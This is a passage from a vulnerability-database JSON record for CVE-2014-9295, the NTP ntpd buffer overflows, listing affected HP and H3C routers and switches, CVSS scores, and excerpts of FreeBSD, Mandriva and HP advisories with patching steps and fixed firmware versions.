"hsr6800 ru r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "hsr6800 (comware r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "hsr6602 ru r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "hsr6602 (comware r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "hp870 (comware r2607p35", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "hp850 (comware r2607p35", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "hp830 (comware r3507p35", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "hp6000 (comware r2507p35", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "f5000-c/s (comware r3811p03", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "f5000-a (comware f3210p23", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "f1000-s-ei (comware r3734p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "f1000-e (comware r3181p05", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "f1000-a-ei (comware r3734p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "a6600 (comware r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "9500e (comware r1828p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "(comware r3627p04", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "88005)" }, { "model": "(comware r2122", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "79007)" }, { "model": "(comware r6708p10", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "75005)" }, { "model": "ru r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "66025" }, { "model": "rse ru r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "66005" }, { "model": "rpe ru r3303p18", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "66005" }, { "model": "(comware r2311p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "59207)" }, { "model": "(comware r2311p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "59007)" }, { "model": "(comware r1118p11", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "58305)" }, { "model": "(comware r1809p03", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "58205)" }, { "model": "(comware r7006p12", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "58007)" }, { "model": "(comware r1809p03", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "58005)" }, { "model": "(comware r2311p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "57007)" }, { "model": "5500si (comware r2221p08", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "hi (comware r5501p06", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "55005)" }, { "model": "(comware r3108p03", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "51307)" }, { "model": "(comware r1112", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "129007)" }, { "model": "(comware r7328p04", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "125007)" }, { "model": "(comware r7169p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "119007)" }, { "model": "(comware r7150", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "105007)" }, { "model": "vipr srm", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "3.6.1" }, { "model": "m\u0026r 6.5u1", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": null } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "BID", "id": "71761" }, { "db": "JVNDB", "id": "JVNDB-2014-007352" }, { "db": "NVD", "id": "CVE-2014-9295" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.2.7", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-9295" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stephen Roettger and Neel Mehta of the Google Security Team.", "sources": [ { "db": "BID", "id": "71761" } ], "trust": 0.3 }, "cve": "CVE-2014-9295", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2014-9295", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-9295", "trust": 1.8, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2014-9295", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-9295" }, { "db": "JVNDB", "id": "JVNDB-2014-007352" }, { "db": "NVD", "id": "CVE-2014-9295" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple stack-based buffer overflows in ntpd in NTP before 4.2.8 allow remote attackers to execute arbitrary code via a crafted packet, related to (1) the crypto_recv function when the Autokey Authentication feature is used, (2) the ctl_putdata function, and (3) the configure function. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. Network Time Protocol is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. \nSuccessful exploits may allow an attacker to execute arbitrary code with the privileges of the ntpd process. Failed attempts will likely cause a denial-of-service condition. \nNetwork Time Protocol 4.2.7 and prior are vulnerable. \nCorrected: 2014-14-22 19:07:16 UTC (stable/10, 10.1-STABLE)\n 2014-12-23 22:56:01 UTC (releng/10.1, 10.1-RELEASE-p3)\n 2014-12-23 22:55:14 UTC (releng/10.0, 10.0-RELEASE-p15)\n 2014-14-22 19:08:09 UTC (stable/9, 9.3-STABLE)\n 2014-12-23 22:54:25 UTC (releng/9.3, 9.3-RELEASE-p7)\n 2014-12-23 22:53:44 UTC (releng/9.2, 9.2-RELEASE-p17)\n 2014-12-23 22:53:03 UTC (releng/9.1, 9.1-RELEASE-p24)\n 2014-14-22 19:08:09 UTC (stable/8, 8.4-STABLE)\n 2014-12-23 22:52:22 UTC (releng/8.4, 8.4-RELEASE-p21)\nCVE Name: CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. \n\nII. [CVE-2014-9293]\nThe ntp-keygen(8) utility is also affected by a similar issue. [CVE-2014-9296]\n\nIII. Impact\n\nThe NTP protocol uses keys to implement authentication. The weak\nseeding of the pseudo-random number generator makes it easier for an\nattacker to brute-force keys, and thus may broadcast incorrect time stamps\nor masquerade as another time server. [CVE-2014-9295]\n\nIV. Workaround\n\nNo workaround is available, but systems not running ntpd(8) are not\naffected. Because the issue may lead to remote root compromise, the\nFreeBSD Security Team recommends system administrators to firewall NTP\nports, namely tcp/123 and udp/123 when it is not clear that all systems\nhave been patched or have ntpd(8) stopped. \n\nV. \n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n# fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch\n# fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch.asc\n# gpg --verify ntp.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart the ntpd(8) daemons, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/8/ r276073\nreleng/8.4/ r276154\nstable/9/ r276073\nreleng/9.1/ r276155\nreleng/9.2/ r276156\nreleng/9.3/ r276157\nstable/10/ r276072\nreleng/10.0/ r276158\nreleng/10.1/ r276159\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. This situation may be exploitable by an attacker\n (CVE-2014-9296). \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296\n http://advisories.mageia.org/MGASA-2014-0541.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n 25fe56fc0649ac9bb83be467969c2380 mbs1/x86_64/ntp-4.2.6p5-8.1.mbs1.x86_64.rpm\n 9409f5337bc2a2682e09db81e769cd5c mbs1/x86_64/ntp-client-4.2.6p5-8.1.mbs1.x86_64.rpm\n df65cc9c536cdd461e1ef95318ab0d3b mbs1/x86_64/ntp-doc-4.2.6p5-8.1.mbs1.x86_64.rpm \n 53f446bffdf6e87726a9772e946c5e34 mbs1/SRPMS/ntp-4.2.6p5-8.1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFUqn7vmqjQ0CJFipgRAhTAAKCfH+XdZfDmtmE7lgzpV939wjHFdgCfZWiZ\nl2lk5bD8X4tOzwVyLnhX7Dg=\n=JIIF\n-----END PGP SIGNATURE-----\n. \n\nSee the RESOLUTION\n section for a list of impacted hardware and Comware 5, Comware 5 Low\nEncryption SW, Comware 7, and VCX versions. Family\n Fixed Version\n HP Branded Products Impacted\n H3C Branded Products Impacted\n CVE #\n\n8800 (Comware 5)\n R3627P04\n JC137A HP 8805/8808/8812 (2E) Main Control Unit Module, JC138A HP\n8805/8808/8812 (1E) Main Control Unit Module, JC141A HP 8802 Main Control\nUnit Module, JC147A HP 8802 Router Chassis, JC147B HP 8802 Router Chassis,\nJC148A HP 8805 Router Chassis, JC148B HP 8805 Router Chassis, JC149A HP 8808\nRouter Chassis, JC149B HP 8808 Router Chassis, JC150A HP 8812 Router Chassis,\nJC150B HP 8812 Router Chassis, JC596A HP 8800 Dual Fabric Main Processing\nUnit, JC597A HP 8800 Single Fabric Main Processing Unit\n\n CVE-2014-9295\n\nA6600 (Comware 5)\n R3303P18\n JC165A HP 6600 RPE-X1 Router Module, JC177A HP 6608 Router, JC177B HP 6608\nRouter Chassis, JC178A HP 6604 Router Chassis, JC178B HP 6604 Router Chassis,\nJC496A HP 6616 Router Chassis, JC566A HP 6600 RSE-X1 Router Main Processing\nUnit, JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit, JG781A HP\n6600 RPE-X1 TAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\nHSR6602 (Comware 5)\n R3303P18\n JC176A HP 6602 Router Chassis, JG353A HP HSR6602-G Router, JG354A HP\nHSR6602-XG Router, JG355A HP 6600 MCP-X1 Router Main Processing Unit, JG356A\nHP 6600 MCP-X2 Router Main Processing Unit, JG776A HP HSR6602-G TAA-compliant\nRouter, JG777A HP HSR6602-XG TAA-compliant Router, JG778A HP 6600 MCP-X2\nRouter TAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\nHSR6800 (Comware 5)\n R3303P18\n JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A\nHP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing\nUnit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\nMSR20 (Comware 5)\n R2513P45\n JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21\nRouter, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP\nMSR20-40 Router, JF283A HP MSR20-20 Router\n\n CVE-2014-9295\n\nMSR20-1X (Comware 5)\n R2513P45\n JD431A HP MSR20-10 Router, JD667A HP MSR20-15 IW Multi-Service Router,\nJD668A HP MSR20-13 Multi-Service Router, JD669A HP MSR20-13 W Multi-Service\nRouter, JD670A HP MSR20-15 A Multi-Service Router, JD671A HP MSR20-15 AW\nMulti-Service Router, JD672A HP MSR20-15 I Multi-Service Router, JD673A HP\nMSR20-11 Multi-Service Router, JD674A HP MSR20-12 Multi-Service Router,\nJD675A HP MSR20-12 W Multi-Service Router, JD676A HP MSR20-12 T1\nMulti-Service Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A\nRouter, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP\nMSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router,\nJF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP\nMSR20-15-A-W Router, JF817A HP MSR20-15 Router, JG209A HP MSR20-12-T-W Router\n(NA), JG210A HP MSR20-13-W Router (NA)\n H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1, H3C RT-MSR2015-AC-OVS-AW-H3\n(0235A393), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C\nRT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-11 (0235A31V), H3C MSR 20-12\n(0235A32E), H3C MSR 20-12 T1 (0235A32B), H3C MSR 20-13 (0235A31W), H3C MSR\n20-13 W (0235A31X), H3C MSR 20-15 A (0235A31Q), H3C MSR 20-15 A W (0235A31R),\nH3C MSR 20-15 I (0235A31N), H3C MSR 20-15 IW (0235A31P), H3C MSR20-12 W\n(0235A32G)\n CVE-2014-9295\n\nMSR 30 (Comware 5)\n R2513P45\n JD654A HP MSR30-60 POE Multi-Service Router, JD657A HP MSR30-40\nMulti-Service Router, JD658A HP MSR30-60 Multi-Service Router, JD660A HP\nMSR30-20 POE Multi-Service Router, JD661A HP MSR30-40 POE Multi-Service\nRouter, JD666A HP MSR30-20 Multi-Service Router, JF229A HP MSR30-40 Router,\nJF230A HP MSR30-60 Router, JF232A HP RTMSR3040-AC-OVSAS-H3, JF235A HP\nMSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router,\nJF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP\nMSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router\n H3C MSR 30-20 Router (0235A328), H3C MSR 30-40 Router Host(DC) (0235A268),\nH3C RT-MSR3020-AC-POE-OVS-H3 (0235A322), H3C RT-MSR3020-DC-OVS-H3 (0235A267),\nH3C RT-MSR3040-AC-OVS-H (0235A299), H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323),\nH3C RT-MSR3060-AC-OVS-H3 (0235A320), H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296),\nH3C RT-MSR3060-DC-OVS-H3 (0235A269), H3C MSR 30-20 RTVZ33020AS Router\nHost(AC) (0235A20S), H3C MSR 30-20 (0235A19L), H3C MSR 30-20 POE (0235A239),\nH3C MSR 30-40 (0235A20J), H3C MSR 30-40 POE (0235A25R), H3C MSR 30-60\n(0235A20K), H3C MSR 30-60 POE (0235A25S), H3C RT-MSR3040-AC-OVS-AS-H3\n(0235A20V)\n CVE-2014-9295\n\nMSR 30-16 (Comware 5)\n R2513P45\n JD659A HP MSR30-16 POE Multi-Service Router, JD665A HP MSR30-16\nMulti-Service Router, JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE\nRouter,\n H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3\n(0235A321), H3C MSR 30-16 (0235A237), H3C MSR 30-16 POE (0235A238)\n CVE-2014-9295\n\nMSR 30-1X (Comware 5)\n R2513P45\n JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr,\nJG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC\nRouter\n 2FE 2SIC 1XMIM 256DDR (0235A39H), H3C RT-MSR3011-AC-OVS-H3 (0235A29L)\n CVE-2014-9295\n\nMSR 50 (Comware 5)\n R2513P45\n JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP\nMSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router,\nJF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60\nRtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297), H3C MSR5040-DCOVS-H3C (0235A20P), H3C\nRT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR 50-40 Chassis (0235A20N), H3C MSR\n50-60 Chassis (0235A20L)\n CVE-2014-9295\n\nMSR 50-G2 (Comware 5)\n R2513P45\n JD429A HP MSR50 G2 Processor Module, JD429B HP MSR50 G2 Processor Module\n H3C H3C MSR 50 Processor Module-G2 (0231A84Q), H3C MSR 50 High Performance\nMain Processing Unit 3GE (Combo) 256F/1GD (0231A0KL)\n CVE-2014-9295\n\nMSR 9XX (Comware 5)\n R2513P45\n JF812A HP MSR900 Router, JF813A HP MSR920 Router, JF814A HP MSR900-W Router,\nJF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr, JG207A HP MSR900-W Router (NA),\nJG208A HP MSR920-W Router (NA)\n H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b\n(0235A0C2), H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX), H3C MSR\n920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4), H3C MSR 920\nRouter 2 FE WAN 8 FE LAN 256DDR (0235A0C0)\n CVE-2014-9295\n\nMSR 93X (Comware 5)\n R2513P45\n JG512A HP MSR930 Wireless Router, JG513A HP MSR930 3G Router, JG514A HP\nMSR931 Router, JG515A HP MSR931 3G Router, JG516A HP MSR933 Router, JG517A HP\nMSR933 3G Router, JG518A HP MSR935 Router, JG519A HP MSR935 Wireless Router,\nJG520A HP MSR935 3G Router, JG531A HP MSR931 Dual 3G Router, JG596A HP MSR930\n4G LTE/3G CDMA Router, JG597A HP MSR936 Wireless Router, JG665A HP MSR930 4G\nLTE/3G WCDMA Global Router, JG704A HP MSR930 4G LTE/3G WCDMA ATT Router\n N/A\n CVE-2014-9295\n\nMSR1000 (Comware 5)\n R2513P45\n JG732A HP MSR1003-8 AC Router\n N/A\n CVE-2014-9295\n\nMSR20 (Comware 5 - Low Encryption SW)\n R2513L61\n JD663B HP MSR20-21 Router, JF228A HP MSR20-40 Router, JF283A HP MSR20-20\nRouter\n H3C RT-MSR2020-AC-OVS-H3C (0235A324), H3C RT-MSR2040-AC-OVS-H3 (0235A326)\n CVE-2014-9295\n\nMSR20-1X (Comware 5 - Low Encryption SW)\n R2513L61\n JD431A HP MSR20-10 Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A\nRouter, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP\nMSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router,\nJF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP\nMSR20-15-A-W Router, JF817A HP MSR20-15 Router\n H3C MSR 20-10 (0235A0A7), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C\nRT-MSR2015-AC-OVS-A-H3 (0235A392), H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393),\nH3C RT-MSR2011-AC-OVS-H3 (0235A395), H3C RT-MSR2013-AC-OVS-H3 (0235A390), H3C\nRT-MSR2012-AC-OVS-H3 (0235A396), H3C RT-MSR2012-TAC-OVS-H3 (0235A398), H3C\nRT-MSR2012-AC-OVS-W-H3 (0235A397), H3C RT-MSR2013-AC-OVS-W-H3 (0235A391), H3C\nRT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW\n1 ADSLoPOTS 1 DSIC (0235A0A8)\n CVE-2014-9295\n\nMSR30 (Comware 5 - Low Encryption SW)\n R2513L61\n JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router, JF235A HP MSR30-20 DC\nRouter, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router, JF801A HP\nMSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP MSR30-40 PoE\nRouter, JF804A HP MSR30-60 PoE Router\n H3C RT-MSR3040-AC-OVS-H (0235A299), H3C RT-MSR3060-AC-OVS-H3 (0235A320), H3C\nRT-MSR3020-DC-OVS-H3 (0235A267), H3C MSR 30-20 Router (0235A328), H3C MSR\n30-40 Router Host(DC) (0235A268), H3C RT-MSR3060-DC-OVS-H3 (0235A269), H3C\nRT-MSR3020-AC-POE-OVS-H3 (0235A322), H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323),\nH3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)\n CVE-2014-9295\n\nMSR30-16 (Comware 5 - Low Encryption SW)\n R2513L61\n JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router\n H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)\n CVE-2014-9295\n\nMSR30-1X (Comware 5 - Low Encryption SW)\n R2513L61\n JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr,\nJG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC\nRouter\n H3C RT-MSR3011-AC-OVS-H3 (0235A29L), H3C MSR 30-10 Router Host(AC) 2FE 2SIC\n1XMIM 256DDR (0235A39H)\n CVE-2014-9295\n\nMSR50 (Comware 5 - Low Encryption SW)\n R2513L61\n JD433A HP MSR50-40 Router, JD653A HP MSR50Processor Module, JD655A HP\nMSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router,\nJF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60\nRtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297), H3C MSR 50 Processor Module (0231A791), H3C\nMSR 50-40 Chassis (0235A20N), H3C MSR 50-60 Chassis (0235A20L), H3C\nRT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR5040-DCOVS-H3C (0235A20P)\n CVE-2014-9295\n\nMSR50 G2 (Comware 5 - Low Encryption SW)\n R2513L61\n JD429B HP MSR50 G2 Processor Module\n H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD\n(0231A0KL)\n CVE-2014-9295\n\n12500 (Comware 5)\n R1828P06\n JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP\n12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504\nAC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch\nChassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis,\nJF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP\n12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JC808A HP\n12500 TAA Main Processing Unit\n H3C S12508 Routing Switch (AC-1) (0235A0GE), H3C S12518 Routing Switch\n(AC-1) (0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis\n(0235A38N), H3C S12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M), H3C\n12508 DC Switch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K)\n CVE-2014-9295\n\n9500E (Comware 5)\n R1828P06\n JC124A HP A9508 Switch Chassis, JC124B HP 9505 Switch Chassis, JC125A HP\nA9512 Switch Chassis, JC125B HP 9512 Switch Chassis, JC474A HP A9508-V Switch\nChassis, JC474B HP 9508-V Switch Chassis\n H3C S9505E Routing-Switch Chassis (0235A0G6), H3C S9512E Routing-Switch\nChassis (0235A0G7), H3C S9508E-V Routing-Switch Chassis (0235A38Q), H3C\nS9505E Chassis w/ Fans (0235A38P), H3C S9512E Chassis w/ Fans (0235A38R)\n CVE-2014-9295\n\n10500 (Comware 5)\n R1208P10\n JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP\n10504 Switch Chassis, JC614A HP 10500 Main Processing Unit, JC748A HP 10512\nSwitch Chassis, JG375A HP 10500 TAA-compliant Main Processing Unit, JG820A HP\n10504 TAA-compliant Switch Chassis, JG821A HP 10508 TAA-compliant Switch\nChassis, JG822A HP 10508-V TAA-compliant Switch Chassis, JG823A HP 10512\nTAA-compliant Switch Chassis\n\n CVE-2014-9295\n\n7500 (Comware 5)\n R6708P10\n JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port Gig-T/4-port\nGbE Combo, JC697A HP 7502 TAA-compliant Main Processing Unit, JC698A HP\n7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8 GbE Combo Ports,\nJC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP Ports,\nJC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit, JC701A HP\n7500 768Gbps TAA-compliant Fabric / Main Processing Unit, JD193A HP 7500\n384Gbps Fabric Module with 2 XFP Ports, JD193B HP 7500 384Gbps Fabric Module\nwith 2 XFP Ports, JD194A HP 7500 384Gbps Fabric Module, JD194B HP 7500\n384Gbps Fabric Module, JD195A HP 7500 384Gbps Advanced Fabric Module, JD196A\nHP 7502 Fabric Module, JD220A HP 7500 768Gbps Fabric Module, JD224A HP 7500\n384Gbps Fabric Module with 12 SFP Ports, JD238A HP 7510 Switch Chassis,\nJD238B HP 7510 Switch Chassis, JD239A HP 7506 Switch Chassis, JD239B HP 7506\nSwitch Chassis, JD240A HP 7503 Switch Chassis, JD240B HP 7503 Switch Chassis,\nJD241A HP 7506-V Switch Chassis, JD241B HP 7506-V Switch Chassis, JD242A HP\n7502 Switch Chassis, JD242B HP 7502 Switch Chassis, JD243A HP 7503-S Switch\nChassis with 1 Fabric Slot, JD243B HP 7503-S Switch Chassis 